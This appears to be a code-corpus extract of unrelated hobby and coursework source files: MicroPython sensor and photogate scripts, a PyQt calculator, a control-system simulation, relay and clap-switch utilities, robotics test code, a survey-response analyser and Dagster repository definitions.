i2c = machine.I2C(scl=machine.Pin(5), sda=machine.Pin(4))
oled = ssd1306.SSD1306_I2C(128, 64, i2c, 0x3c)
from sensor_manager import PhotoGate
g1 = PhotoGate(GATE_PIN, mode=GATE_MODE) # mode = 1 | 0
oled.fill(0)
oled.rect(0,0,128,40,1)
oled.text('PhotoGate', 28, 8)
oled.text('in MicroPython', 10, 24)
oled.text(mqtt_client.CONFIG['client_id'], 00, 48)
oled.text(mqtt_client.CONFIG['broker'], 00, 56)
oled.show()
def update_oled(data):
oled.scroll(0, -8)
oled.fill_rect(0, 56, 128, 64, 0)
oled.text('{:10.3f}'.format(data), 0, 56)
oled.show()
gc.collect()
while True:
g1.read()
if g1.event_change_to(1):
g1.start_time()
if g1.event_change_to(0):
g1.stop_time()
print(g1.millis)
update_oled(g1.millis)
msg = {'value': g1.millis, 'units': 'ms'}
mqtt_client.send(TOPIC_PUB, json.dumps(msg))
gc.collect()
g1.store()
if DEBUG:
time.sleep_us(DEBUG_TIME)
else:
time.sleep_us(DELAY_TIME)
#End while loops
```
#### File: MicroPython/examples/uPhotoGate_OLED.py
```python
import os, gc, micropython, machine, time, json
from board_manager import D1, D2, D7
GATE_PIN = micropython.const(D7) # D7
GATE_MODE = micropython.const(0) # 0 for always on | 1 for always off
DEBUG = micropython.const(1) # Change from 1 debug mode to 0 production mode
DEBUG_TIME = micropython.const(10) # Run in debug mode for this amount of seconds
DELAY_TIME = micropython.const(1) # Delay between loops
print('PhotoGate in MicroPython')
# ssd1306 version
import ssd1306
i2c = machine.I2C(scl=machine.Pin(D1), sda=machine.Pin(D2))
oled = ssd1306.SSD1306_I2C(128, 64, i2c, 0x3c)
from sensor_manager import PhotoGate
g1 = PhotoGate(GATE_PIN, mode=GATE_MODE) # mode = 1 | 0
oled.fill(0)
oled.rect(0,0,128,40,1)
oled.text('PhotoGate', 28, 8)
oled.text('in MicroPython', 10, 24)
oled.text('in milli seconds', 00, 56)
oled.show()
def update_oled(data):
oled.scroll(0, -8)
oled.fill_rect(0, 56, 128, 64, 0)
oled.text('{:10.3f}'.format(data), 0, 56)
oled.show()
gc.collect()
while True:
g1.read()
if g1.event_change_to(1):
g1.start_time()
if g1.event_change_to(0):
g1.stop_time()
print(g1.millis)
update_oled(g1.millis)
g1.store()
if DEBUG:
time.sleep_us(DEBUG_TIME)
else:
time.sleep_us(DELAY_TIME)
#End while loops
```
#### File: MicroPython/sensors/sensor_bh1750fvi.py
```python
import machine, time
class Sensor_BH1750FVI():
#adaptation from https://github.com/catdog2/mpy_bh1750fvi_esp8266
def __init__(self, i2c, address=0x23):
if not isinstance(i2c, machine.I2C):
raise TypeError('I2C object required.')
self.i2c = i2c
self.address = address
self.lux = None
def read(self):
self.i2c.writeto(self.address, b'\x00') # make sure device is in a clean state
self.i2c.writeto(self.address, b'\x01') # power up
self.i2c.writeto(self.address, bytes([0x23])) # set measurement mode
time.sleep_ms(180)
raw = self.i2c.readfrom(self.address, 2)
self.i2c.writeto(self.address, b'\x00') # power down again
# we must divide the end result by 1.2 to get the lux
self.lux = ((raw[0] << 24) | (raw[1] << 16)) // 78642
return self.lux
@property
def values(self):
return [self.lux]
@property
def values_dict(self):
return {'lux': self.lux}
#End of Sensor_BH1750FVI
```
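A short usage sketch for the driver above; the I2C pins (GPIO5/GPIO4, i.e. D1/D2 on a Wemos D1 mini) and the one-second poll interval are assumptions:
```python
import machine, time

from sensor_bh1750fvi import Sensor_BH1750FVI

i2c = machine.I2C(scl=machine.Pin(5), sda=machine.Pin(4))
sensor = Sensor_BH1750FVI(i2c)   # default I2C address 0x23

for _ in range(3):
    sensor.read()                # triggers a one-shot measurement (~180 ms)
    print(sensor.values_dict)    # e.g. {'lux': 321}
    time.sleep(1)
```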
#### File: MicroPython/sensors/sensor_bmp085.py
```python
import micropython, machine, ustruct, time, math
# from https://github.com/robert-hh/BMP085_BMP180
class Sensor_BMP085():
def __init__(self, i2c, address=0x77):
if not isinstance(i2c, machine.I2C):
raise TypeError("I2C object required.")
from bmp085 import BMP085
self.bmp = BMP085(i2c=i2c)
self.t = None
self.p = None
self.a = None
self.bmp.sealevel = 101325
def read(self):
self.t = self.bmp.temperature
self.p = self.bmp.pressure
self.a = self.bmp.altitude
self.t = round(self.t,1)
self.p = round(self.p,2)
self.a = round(self.a,1)
return [self.t, self.p, self.a]
@property
def values(self):
return [self.t, self.p, self.a]
@property
def values_dict(self):
return {"t": self.t, "p": self.p, "a": self.a}
#End of Sensor_BMP085
class Sensor_BMP180(Sensor_BMP085):
def __init__(self, i2c=None, address=0x77):
super().__init__(i2c, address)
#End of Sensor_BMP180
```
#### File: MicroPython/sensors/sensor_hcsr04.py
```python
import machine, time
class HCSR04():
def __init__(self, trigger, echo, echo_timeout_us=500000):
if isinstance(trigger, int) and isinstance(echo, int):
self.trigger = machine.Pin(trigger, mode=machine.Pin.OUT, pull=None)
self.echo = machine.Pin(echo, mode=machine.Pin.IN, pull=None)
else:
raise TypeError('trigger and echo must be integer')
self.echo_timeout_us = echo_timeout_us
self.trigger.value(0)
self.pulse_time = None
def _send_pulse_and_wait(self):
self.trigger.value(0)
time.sleep_us(5)
self.trigger.value(1)
time.sleep_us(10)
self.trigger.value(0)
try:
pulse_time = machine.time_pulse_us(self.echo, 1, self.echo_timeout_us)
return pulse_time
except OSError as ex:
if ex.args[0] == 110: # 110 = ETIMEDOUT
raise OSError('Out of range')
raise ex
def read(self):
self.pulse_time = self._send_pulse_and_wait()
return self.pulse_time
@property
def distance_mm(self):
if self.pulse_time:
return self.pulse_time * 100 // 582
else:
return None
@property
def distance_cm(self):
if self.pulse_time:
return (self.pulse_time / 2) / 29.1
else:
return None
@property
def values(self):
return [self.distance_cm]
@property
def values_dict(self):
return {'d': self.distance_cm}
#End of HCSR04
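# Usage sketch (hypothetical wiring, for illustration): trigger on GPIO5 (D1) and
# echo on GPIO4 (D2) of an ESP8266 board:
#   sensor = HCSR04(trigger=5, echo=4)
#   sensor.read()
#   print(sensor.distance_cm)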
``` |
{
"source": "j-pedrofag/SEII-JoaoPedroSilvaFagundes",
"score": 3
} |
#### File: SEII-JoaoPedroSilvaFagundes/Semana08-09/calculadora.py
```python
import PyQt5.QtWidgets as qtw
class MainWindow(qtw.QWidget):
def __init__(self):
super().__init__()
self.setWindowTitle('Calculadora')
self.setLayout(qtw.QVBoxLayout())
self.temp_nums = [] # digits typed since the last operator
self.fin_nums = [] # expression accumulated so far
self.keypad()
self.show()
def keypad(self):
container = qtw.QWidget()
container.setLayout(qtw.QGridLayout())
# Buttons
self.result_field = qtw.QLineEdit()
btn_result = qtw.QPushButton('Enter',clicked = self.func_result)
btn_limpar = qtw.QPushButton('Limpar',clicked = self.limpar_calc)
btn_9 = qtw.QPushButton('9',clicked = lambda:self.num_press('9'))
btn_8 = qtw.QPushButton('8',clicked = lambda:self.num_press('8'))
btn_7 = qtw.QPushButton('7',clicked = lambda:self.num_press('7'))
btn_6 = qtw.QPushButton('6',clicked = lambda:self.num_press('6'))
btn_5 = qtw.QPushButton('5',clicked = lambda:self.num_press('5'))
btn_4 = qtw.QPushButton('4',clicked = lambda:self.num_press('4'))
btn_3 = qtw.QPushButton('3',clicked = lambda:self.num_press('3'))
btn_2 = qtw.QPushButton('2',clicked = lambda:self.num_press('2'))
btn_1 = qtw.QPushButton('1',clicked = lambda:self.num_press('1'))
btn_0 = qtw.QPushButton('0',clicked = lambda:self.num_press('0'))
btn_mais = qtw.QPushButton('+',clicked = lambda:self.func_press('+'))
btn_menos = qtw.QPushButton('-',clicked = lambda:self.func_press('-'))
btn_mult = qtw.QPushButton('*',clicked = lambda:self.func_press('*'))
btn_divid = qtw.QPushButton('÷',clicked = lambda:self.func_press('/')) # shows ÷ but evaluates with '/'
# Adding the buttons to the layout
container.layout().addWidget(self.result_field,0,0,1,4)
container.layout().addWidget(btn_result,1,0,1,2)
container.layout().addWidget(btn_limpar,1,2,1,2)
container.layout().addWidget(btn_9,2,0)
container.layout().addWidget(btn_8,2,1)
container.layout().addWidget(btn_7,2,2)
container.layout().addWidget(btn_mais,2,3)
container.layout().addWidget(btn_6,3,0)
container.layout().addWidget(btn_5,3,1)
container.layout().addWidget(btn_4,3,2)
container.layout().addWidget(btn_menos,3,3)
container.layout().addWidget(btn_3,4,0)
container.layout().addWidget(btn_2,4,1)
container.layout().addWidget(btn_1,4,2)
container.layout().addWidget(btn_mult,4,3)
container.layout().addWidget(btn_0,5,0,1,3)
container.layout().addWidget(btn_divid,5,3)
self.layout().addWidget(container)
def num_press(self,key_number):
self.temp_nums.append(key_number)
temp_string = ''.join(self.temp_nums)
if self.fin_nums:
self.result_field.setText(''.join(self.fin_nums) + temp_string)
else:
self.result_field.setText(temp_string)
def func_press(self, operator):
temp_string = ''.join(self.temp_nums)
self.fin_nums.append(temp_string)
self.fin_nums.append(operator)
self.temp_nums = []
self.result_field.setText(''.join(self.fin_nums))
def func_result(self):
fin_string = ''.join(self.fin_nums) + ''.join(self.temp_nums)
result_string = eval(fin_string)
fin_string += '='
fin_string += str(result_string)
self.result_field.setText(fin_string)
def limpar_calc(self):
self.result_field.clear()
self.temp_nums = []
self.fin_nums = []
app = qtw.QApplication([])
mw = MainWindow()
app.setStyle(qtw.QStyleFactory.create('Fusion'))
app.exec_()
```
#### File: SEII-JoaoPedroSilvaFagundes/Semana16-18/Questao2.py
```python
from control.matlab import *
import numpy as np
import matplotlib.pyplot as plt
import math
def x_dot(t,x,u):
A = np.array( [[-2., -9.],\
[ 1., 0.]])
B = np.array([[1.],\
[0.]])
xkp1 = A @ x + B @ u
return xkp1
def rk4(tk,h,xk,uk):
xk = xk.reshape([2,1])
uk = uk.reshape([1,1])
k1 = x_dot(tk,xk,uk)
k2 = x_dot(tk+h/2.0,xk+h*k1/2.0,uk)
k3 = x_dot(tk+h/2.0,xk+h*k2/2.0,uk)
k4 = x_dot(tk+h,xk+h*k3,uk)
xkp1 = xk + (h/6.0)*(k1 + 2.0*k2 + 2.0*k3 + k4)
return xkp1.reshape([2,])
def compensador(G,Ms,ts=2):
zeta = np.sqrt(np.log(Ms)**2/(np.pi**2+np.log(Ms)**2))
wn = 4/(zeta*ts)
polo = [zeta*wn,wn*np.sqrt(1-zeta*zeta)]
poloComplex = -polo[0]+polo[1]*1j
theta = math.atan2(polo[1],polo[0])
phi = np.pi/2 - theta
beta = (np.pi - theta)/2
gamma = theta+beta-phi/2-np.pi/2
a = polo[0] + polo[1]*np.tan(gamma)
b = polo[0] + polo[1]*np.tan(gamma+phi)
C = tf([1,a],[1,b])
K = abs(1/(evalfr(C,poloComplex)*evalfr(G,poloComplex)))
C = K*C
return tf(C)
# Parameters
G = tf([9],[1,2,9])
# Part (a): design the compensator for maximum overshoot Ms = 0.1 (10%) and settling time ts = 2 s
C = compensador(G,0.1,2)
print(C)
T = feedback(C*G,1)
t = np.arange(0,10,1e-3)
u = t*0+1
y,x,*_ = lsim(T,u,t)
plt.figure('a')
plt.plot(x,y)
plt.title('Step response')
plt.grid()
# Part (b): discretize the controller with Ts = 0.01 s and simulate the closed loop with RK4
Gss = tf2ss(G)
Ts = 0.01
Cz = c2d(C,Ts,method = 'zoh')
h = 1e-4
maxT = 10
mult = Ts/h
t = np.arange(0,maxT,h)
tu = np.arange(0,maxT,Ts)
x = np.zeros([2,len(t)])
u = np.zeros([len(tu)])
r = np.ones([len(t)-1])
y = np.zeros([len(t)-1])
tam = len(t)-1
ek_1 = 0
uk_1 = 0
p = 0
for k in range(tam):
y[k] = Gss.C @ x[:,k]
if (k%mult)==0:
ek = r[k]-y[k]
u[p] = 0.8607*uk_1 + 10*ek - 9.9257*ek_1 # discrete controller update for Ts = 0.01
ek_1 = ek
uk_1 = u[p]
p += 1
x[:,k+1] = rk4(t[k],h,x[:,k],u[p-1])
plt.figure('b.1')
plt.subplot(2,1,1)
plt.plot(t,x[0,:])
plt.subplot(2,1,2)
plt.plot(t,x[1,:])
plt.figure('b.2')
plt.plot(t[0:-1],y)
plt.plot(t[0:-1],r)
plt.title('Runge-Kutta simulation vs. unit step reference')
plt.figure('b.3')
plt.plot(tu[0:len(u)],u)
plt.show()
``` |
{
"source": "jpedrorl/LightSwitch",
"score": 3
} |
#### File: jpedrorl/LightSwitch/androidServer.py
```python
import socket
import sys
import threading
class Server:
def __init__(self, port, relay):
self.port = port
self.running = False
self.thread = threading.Thread(target = self.__startServer)
self.thread.setDaemon(True) # dies with main thread
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind(('', port))
self.relay = relay
def __startServer(self):
self.sock.listen(1)
while self.running:
conn, addr = self.sock.accept()
print "connected to ", addr
isConnected = True
while(isConnected):
try:
buf = conn.recv(8)
if ord(buf[0]) == 1:
self.relay.switch()
except(socket.error, IndexError):
isConnected = False
print "disconnected from ", addr
conn.close() # always release the client connection once it disconnects
def run(self):
self.running = True
self.thread.start()
def stop(self):
self.running = False
```
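A hedged client-side sketch of the wire protocol the server above expects: any received chunk whose first byte equals 1 triggers `relay.switch()`. The host and port are assumptions for a locally running `Server(5000, relay)`:
```python
import socket

# Connect to the listening Server and send a single byte of value 1,
# which the server interprets as a "toggle the relay" command.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 5000))
sock.sendall(b"\x01")
sock.close()
```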
#### File: jpedrorl/LightSwitch/clap.py
```python
import alsaaudio
import time
import audioop
import threading
class ClapListener:
clapThreshold = 3000
def __init__(self, relay):
self.inp = alsaaudio.PCM(alsaaudio.PCM_CAPTURE,alsaaudio.PCM_NONBLOCK)
# Set attributes: Mono, 8000 Hz, 16 bit little endian samples
self.inp.setchannels(1)
self.inp.setrate(8000)
self.inp.setformat(alsaaudio.PCM_FORMAT_S16_LE)
# The period size controls the internal number of frames per period.
# Reads from the device will return this many frames. Each frame being 2 bytes long.
# This means that the reads below will return either 320 bytes of data
# or 0 bytes of data. The latter is possible because we are in nonblocking
# mode.
self.inp.setperiodsize(160)
# Relay object
self.relay = relay
# Flag: switch only once per peak
self.hold = False
self.thread = threading.Thread(target = self.__listen)
def __listen(self):
while self.running:
l,data = self.inp.read() # Read data from mic
if l: # data was read
max = audioop.max(data, 2); # max abs input from mic
if max > ClapListener.clapThreshold and not self.hold:
self.relay.switch()
self.hold = True
elif max < ClapListener.clapThreshold:
self.hold = False
def run(self):
self.running = True
self.thread.start()
def stop(self):
self.running = False
``` |
{
"source": "jpedrorl/Robotics-AI",
"score": 3
} |
#### File: Robotics-AI/challenge1/harry_plotter.py
```python
from robot import robot
import matplotlib.pyplot as plt
import math
class harry_plotter:
def __init__(self, rob, robAI):
self.rob = rob
self.robAI = robAI
plt.ion()
def update(self):
self.plotMap()
# self.plotSensors()
def plotSensors(self):
plt.clf()
# initialize graph
plt.title('Sensors')
plt.ylabel('')
plt.xlabel('')
plt.xlim(-1.5,1.5)
plt.ylim(-1.5,1.5)
plt.grid(False)
## This plot is rotated 90 degrees!
# plot sensors
sensors = self.rob.get_rel_sonar_positions()
for p in sensors:
plt.scatter(-p[1], p[0], 1, c='y')
# plot robot center
robotColor = 'black'
if self.robAI.check_stuck:
robotColor = 'yellow'
plt.scatter(0,0,1,c=robotColor)
# plot detected positions
detected = self.rob.get_rel_sonar_readings()
for p in detected:
plt.scatter(-p[1], p[0], 1, c='r')
# Update shown plot
plt.pause(0.000000001)
def plotMap(self):
# plt.clf()
# initialize graph
plt.title('Obstacles Chamber')
plt.ylabel('Y')
plt.xlabel('X')
plt.xlim(-1000,1000)
plt.ylim(-1000,1000)
plt.grid(False)
# plot robot
robotColor = 'red'
if self.robAI.check_stuck:
robotColor = 'yellow'
plt.scatter(int(100 * self.rob.position[0]), int(100 * self.rob.position[1]), 1, c=robotColor)
# plot detected positions
detected = self.rob.get_rel_sonar_readings()
for p in detected:
# rotate
th = self.rob.orientation[2]
x = math.cos(th) * p[0] - math.sin(th) * p[1]
y = math.sin(th) * p[0] + math.cos(th) * p[1]
# translate
x = x + self.rob.position[0]
y = y + self.rob.position[1]
# zoom in and round to integer
x = int(100 * x)
y = int(100 * y)
# plot
plt.scatter(x, y, 1, c='black')
# Update shown plot
plt.pause(0.000000001)
```
#### File: final/ai_utils/noise.py
```python
import random
import numpy as np
class ou:
def apply(self, x, mu=0., theta=.15, sigma=.2):
return theta * (mu - x) + sigma * np.random.randn(1)
```
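`ou.apply` above returns a single Ornstein-Uhlenbeck increment; a small sketch of accumulating it into a temporally correlated noise sequence (the step count and starting value are illustrative, and the import assumes the script runs from the `final/` directory):
```python
import numpy as np

from ai_utils.noise import ou

noise = ou()
x = 0.0
samples = []
for _ in range(100):
    x = x + noise.apply(x)[0]   # apply() returns the increment as a 1-element array
    samples.append(x)

print("mean:", np.mean(samples), "std:", np.std(samples))
```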
#### File: Robotics-AI/final/test_robot.py
```python
import random
from time import time
from robbie import Robbie
from simulator import Simulator
TIMEOUT = 10
SIMULATOR_PORT = 25000
def test_robot():
# connect to vrep simulator
sim = Simulator("127.0.0.1", SIMULATOR_PORT)
sim.connect()
# get robbie instance and reset it
robbie = Robbie(sim, "Robbie")
robbie.reset_robot()
# total time of this generation
start_time = time()
# update loop
while True:
# send actions to robot
actions = [random.randrange(-1, 1) for _ in range(8)]
new_state, reward, done = robbie.act(actions)
print(new_state + [reward] + [done])
# get generation execution time
gen_time = time() - start_time
# reset robot if finished simulation or timed out
if done or gen_time >= TIMEOUT:
robbie.reset_robot()
start_time = time()
# disconnect from simulator
sim.disconnect()
if __name__ == "__main__":
test_robot()
``` |
{
"source": "jpeelle/sentence-prediction",
"score": 4
} |
#### File: jpeelle/sentence-prediction/anonymizer.py
```python
import sys
def mturk_anonymizer(csvfiles):
'''
Anonymizes Mechanical Turk data by replacing the WorkerId with a number that
can't be used to identify the participant, but ensures that each participant
keeps the same new number even if they participate in multiple trials.
Inputs: csvfiles, a list of csv files with Mechanical Turk data that need to
be anonymized. Assumes the header contains a 'WorkerId' column.
Outputs: None, writes a file for each input file (files named the same with
'anonymized_' appended to the front). The file that is written out replaces
the WorkerId with a different number that can't be used to identify the
participant
'''
header = []
id_dict = {} #Keeps track of which number each WorkerId has been mapped to
id_count = 0
for csvfile in csvfiles:
with open('anonymized_'+csvfile, 'w') as anon_file:
with open(csvfile, 'r') as file:
header = file.readline()
header_list = header.split('","')
anon_file.write(header)
worker_id_index = header_list.index('WorkerId')
for line in file:
line_list = line.split('","')
id = str(line_list[worker_id_index]) # WorkerId column, located via the header
if id not in id_dict:
id_count += 1
id_dict[id] = str(id_count)
line_list[worker_id_index] = id_dict[id]
anon_line = '","'.join(line_list)
anon_file.write('"'+anon_line)
'''
Takes each csv with Mechanical Turk data as a command line argument
Example: $python3 anonymizer.py file1.csv file2.csv file3.csv
Would write an anonymized file for file1.csv, file2.csv, and file3.csv
'''
mturk_anonymizer([f for f in sys.argv[1:]])
```
#### File: jpeelle/sentence-prediction/predict_sent_analysis.py
```python
from collections import OrderedDict
import sys
import string
import argparse
from math import log2
def csv_reader(csvfiles, replacement_file=None, censor_file=None, exclusion_file=None):
''' Takes a list of Mechanical Turk csv files as input. For each file, it
finds all sentences and answers and creates two dictionaries. One maps
sentences to answers and their frequencies. The other maps answers to the
questions in which they appear.
Inputs: csvfiles, a list of csv files
Outputs: (question_dict, answer_dict), a tuple of dictionaries
'''
question_dict = {}
answer_dict = {}
question_numbers = {}
question_number = 1
header = []
censor_list = []
exclusion_list = []
if exclusion_file is not None:
with open(exclusion_file, 'r') as file:
for line in file:
exclusion_list.append(line.rstrip(string.whitespace).rstrip(string.punctuation))
if censor_file is not None:
with open(censor_file, 'r') as file:
for line in file:
censor_list.append(line.rstrip(string.whitespace).rstrip(string.punctuation))
if replacement_file is not None:
replacement_dict = word_replacer(replacement_file)
else:
replacement_dict = {}
for csvfile in csvfiles:
indices = [] #Tracks columns in the csv that have sentences and answers
with open(csvfile, 'r') as file:
header = file.readline()
header_list = header.split('","')
sub_id_index = header_list.index('WorkerId')
for i in range(len(header_list)):
if 'sentence' in header_list[i]:
indices.append(i)
for line in file:
line_list = line.split('","')
if line_list[sub_id_index] in exclusion_list:
continue
#Half of 'indices' are sentences and half are the responses
num_questions = len(indices) // 2
for i in range(num_questions):
question = line_list[indices[i]]
if question not in question_numbers:
question_numbers[question] = str(question_number)
question_number += 1
answer = line_list[indices[i+num_questions]].lower()
answer = answer.rstrip(string.whitespace)
answer = answer.rstrip(string.punctuation)
if answer in censor_list:
answer = answer.replace(answer[1:],'*'*(len(answer)-1))
if len(answer) == 0:
answer = 'No Response'
if question_numbers[question] in replacement_dict:
if answer in replacement_dict[question_numbers[question]]:
answer = replacement_dict[question_numbers[question]][answer]
if i == (num_questions - 1):
#Strip the newline character off the end of last answer
answer = answer.strip('"\n')
if question in question_dict:
question_dict[question].append(answer)
else:
question_dict[question] = [answer]
if answer in answer_dict:
answer_dict[answer].add(question)
else:
answer_dict[answer] = set([question])
#Get proportion of total answers
for key, val in question_dict.items():
counter = {}
total = len(val)
for item in val:
#Track how many times an item appears as an answer
if item in counter:
counter[item][0] += 1
else:
counter[item] = [1]
#Add additional field with proportion of total answers to each answer
for k, v in counter.items():
v.append('{}/{}'.format(v[0], total))
v[0] = round(int(v[0]) / total, 2)
answer_dict[k].add((key,v[0]))
answer_dict[k].remove(key)
question_dict[key] = counter
return (question_dict, answer_dict)
def word_replacer(replacement_file):
replacement_dict = {}
with open(replacement_file, 'r') as file:
header = file.readline()
for line in file:
line_list = line.split(',')
question_number = ''.join(c for c in line_list[0] if c.isdigit())
if question_number not in replacement_dict:
replacement_dict[question_number] = {}
replacement_dict[question_number][line_list[1]] = line_list[2].rstrip('\n')
return replacement_dict
def freq_sorter(data_dict):
'''Sorts answers by the their frequency, such that higher frequency answers
appear first.
Inputs: data_dict, a dictionary that maps sentences to a dictionary, which
maps answers to a pair of: the number of responses and the proportion of
total responses
Outputs: data_dict, the same dictionary except answers are now sorted such
that higher frequency responses appear first
'''
for key, value in data_dict.items():
#Sorts answers in descending order with the frequency as the key
data_dict[key] = OrderedDict(sorted(value.items(),
key=lambda x: x[1][0], reverse=True))
return data_dict
def output_markdown(data_dict, filename='output.md'):
'''Writes input dictionary out to a file.
Inputs: -data_dict, a dictionary
-filename, a string (default value is 'output.txt')
Outputs: None, creates file named filename with data from data_dict
'''
print('Writing markdown file, {}'.format(filename))
with open(filename, 'w') as file:
count = 1 #For printing Question number above each question
for k, v in data_dict.items():
file.write('{}. {}\n\n'.format(count, k))
for key, val in v.items():
file.write('\t* {} ({:.2f})\n'.format(key, val[0]))
file.write('\n')
count += 1
def output_csv(data_dict, filename='output.tsv', separator='\t'):
print('Writing tsv file, {}'.format(filename))
with open(filename, 'w') as file:
max_resp = 0
for k, v in data_dict.items():
num_answers = len(v)
if num_answers > max_resp:
max_resp = num_answers
#num_ans_resp = []
num_ans = []
num_resp = []
for i in range(max_resp):
#num_ans_resp.append('Answer_' + str(i + 1))
#num_ans_resp.append('Percent_of_Responses_' + str(i + 1))
num_ans.append('Answer_' + str(i + 1))
num_resp.append('Percent_of_Responses_' + str(i + 1))
#header = separator.join(['Question','Number_of_Unique_Responses', 'Response_Entropy', 'Highest_Response_Percent'] + num_ans_resp)
header = separator.join(['Question','Number_of_Unique_Responses', 'Response_Entropy', 'Highest_Response_Percent'] + num_ans + num_resp)
file.write(header + '\n')
for k, v in data_dict.items():
entropy = 0
question = k
num_answers = str(len(v))
answers = []
values = []
highest_percent = 0
for key, val in v.items():
p = val[0]
entropy += p*log2(p)
if p > highest_percent:
highest_percent = p
#answers.append('{}\t{}'.format(key, val[0]))
answers.append(str(key))
values.append(str(val[0]))
entropy *= -1
entropy_str = str(round(entropy, 2))
highest_percent_str = str(highest_percent)
answer_str = separator.join(answers)
value_str = separator.join(values)
line = separator.join((question, num_answers, entropy_str, highest_percent_str, answer_str, value_str))
file.write(line + '\n')
def output_answer_dict(ans_dict, filename):
with open(filename, 'w') as file:
max_qs = 0
for k, v in ans_dict.items():
if len(v) > max_qs:
max_qs = len(v)
num_q = []
for i in range(max_qs):
num_q.append('Question_' + str(i + 1))
num_q.append('Freq_' + str(i + 1))
header = '\t'.join(['Answer', 'Number_of_Questions'] + num_q)
file.write(header + '\n')
for k, v in ans_dict.items():
v_list = [n[0]+'\t'+str(n[1]) for n in v]
line = '\t'.join([k]+[str(len(v_list))]+v_list)
file.write(line + '\n')
# # Relies on a Python Library (pyenchant) to determine if a word is real or not
# # doesn't account for misspellings
# def word_checker(data_dict):
# '''Checks if each answer is in the english dictionary, if not the answer is
# removed.
# Inputs: data_dict, a dictionary that maps sentences to a dictionary, which
# maps answers to a pair of: the number of responses and the proportion of
# total responses
# Outputs: data_dict, the same dictionary but potentially with some answers
# removed
# '''
# en_dic = enchant.Dict('en_US')
# for k, v in data_dict.items():
# bad_keys = []
# new_total = 0
#
# for key in v:
# if not en_dic.check(key):
# bad_keys.append(key)
# for i in bad_keys:
# del v[i]
#
# if len(bad_keys) > 0:
# for key, val in v.items():
# new_total += val[0]
# for key, val in v.items():
# val[1] = '{}/{}'.format(val[0], new_total)
#
# return data_dict
# # Combines infrequent responses into one 'Other' category
# # doesn't account for misspellings
# def infrequency_checker(data_dict, cutoff=2, write_file):
# '''Combines responses that have a number of occurrences less than or equal
# to the cutoff into a single 'Other' category. Optionally writes out all
# removed responses to a file.
# Inputs: -data_dict, a dictionary that maps sentences to a dictionary, which
# maps answers to a pair of: the number of responses and the proportion of
# total responses
# -cutoff, an int that determines how few responses an answer can have before
# it is removed
# -write_file, a bool, if True then the words are written to a file
# Outputs: -(data_dict, infreq_resp), a tuple of the dictionary (potentially)
# with some answer combined into the 'Other' category and the list of answers
# that were removed
# -Optionally writes out a file called 'infreq_resp.txt' that contains all the
# removed words
# '''
# infreq_resp = []
# for k, v in data_dict.items():
# count = 0
# bad_keys = []
#
# for key, val in v.items():
# if val[0] <= cutoff:
# count += val[0]
# total = val[1].split('/')[1]
# bad_keys.append(key)
# for i in bad_keys:
# infreq_resp.append(v[i])
# del v[i]
# v['other'] = [count, '{}/{}'.format(count, total)]
#
# if write_file:
# with open('infreq_resp.txt', 'w') as file:
# for resp in infreq_resp:
# file.write('{}\n'.format(resp))
#
# return (data_dict, infreq_resp)
args = sys.argv
if '--help' in args or '-h' in args:
print('Usage:')
print(' python3 predict_sent_analysis.py <input file 1> <input file 2> ... [options]')
print('Optional Arguments:')
print(' -h, --help\tShow help and exit.')
print(' -r <replacement file>\tTakes input csv with "Question #,word_to_replace,word_to_replace_with" on each line and makes replacements.')
print(' -p\tPrints output to stdout.')
print(' -m [filename]\tWrites output to a markdown file, default file name is output.md.')
print(' -t [filename]\tWrites output to a tsv with "Question Answer 1 Answer 2 ... Freq 1 Freq 2 ..." on each line, default filename is output.tsv.')
print(' -c <censor file>\tTakes input file with one word to censor per line and censors those words.')
print(' -e <exclusion file>\tTakes input file with one Worker ID number to exclude per line and removes responses from those workers.')
exit()
#Optional Files
replacement_file = None
censor_file = None
exclusion_file = None
##Input Files
filenames = []
i = 1
if len(args) < 2:
print('No input filenames provided. Please include input filenames or run with --help for help.')
exit()
while i < len(args) and args[i][0] != '-':
filenames.append(args[i])
i += 1
if not filenames:
print('No input filenames provided. Please include input filenames or run with --help for help.')
exit()
##REPLACEMENT FILE
if '-r' in args:
index = args.index('-r')
if len(args) < index+2:
print('No replacement filename provided. Please include a replacement filename or run with --help for help.')
exit()
if args[index+1][0] == '-':
print('No replacement filename provided. Please include a replacement filename or run with --help for help.')
exit()
replacement_file = args[index+1]
##CENSOR FILE
if '-c' in args:
index = args.index('-c')
if len(args) < index+2:
print('No censor filename provided. Please include a censor filename or run with --help for help.')
exit()
if args[index+1][0] == '-':
print('No censor filename provided. Please include a censor filename or run with --help for help.')
exit()
censor_file = args[index+1]
##EXCLUSION FILE
if '-e' in args:
index = args.index('-e')
if len(args) < index+2:
print('No exclusion filename provided. Please include an exclusion filename or run with --help for help.')
exit()
if args[index+1][0] == '-':
print('No exclusion filename provided. Please include an exclusion filename or run with --help for help.')
exit()
exclusion_file = args[index+1]
#Run the program
dicts = csv_reader(filenames, replacement_file, censor_file, exclusion_file)
q_dict = dicts[0]
a_dict = dicts[1]
sorted_q_dict = freq_sorter(q_dict)
##PRINT TO STDOUT
if '-p' in args:
for k, v in q_dict.items():
sorted_answers = sorted(v.items(), key=lambda x: x[1][0], reverse=True)
print(k, sorted_answers)
print('\n')
##WRITE TO MARKDOWN FILE
if '-m' in args:
index = args.index('-m')
if len(args) >= index+2:
if args[index+1][0] != '-':
output_markdown(sorted_q_dict, args[index+1])
else:
output_markdown(sorted_q_dict)
##WRITE TO CSV FILE
if '-t' in args:
index = args.index('-t')
if len(args) >= index+2:
if args[index+1][0] != '-':
output_csv(sorted_q_dict, args[index+1])
else:
output_csv(sorted_q_dict)
##OUTPUTS FOR SEARCH FUNCTION
output_csv(sorted_q_dict, 'questions_dict.tsv', '\t')
output_answer_dict(a_dict, 'answers_dict.tsv')
``` |
{
"source": "JPeer264/dagster-fork",
"score": 2
} |
#### File: examples/airflow_ingest/repo.py
```python
from airflow_complex_dag import complex_dag
from airflow_simple_dag import simple_dag
from dagster_airflow.dagster_pipeline_factory import make_dagster_pipeline_from_airflow_dag
from dagster import RepositoryDefinition
airflow_simple_dag = make_dagster_pipeline_from_airflow_dag(simple_dag)
airflow_complex_dag = make_dagster_pipeline_from_airflow_dag(complex_dag)
def define_repository():
return RepositoryDefinition(
"airflow_ingest", pipeline_defs=[airflow_complex_dag, airflow_simple_dag]
)
```
#### File: dagster_examples/bay_bikes/repository.py
```python
from dagster import repository
from .pipelines import daily_weather_pipeline, generate_training_set_and_train_model
@repository
def bay_bikes_demo():
return {
'pipelines': {
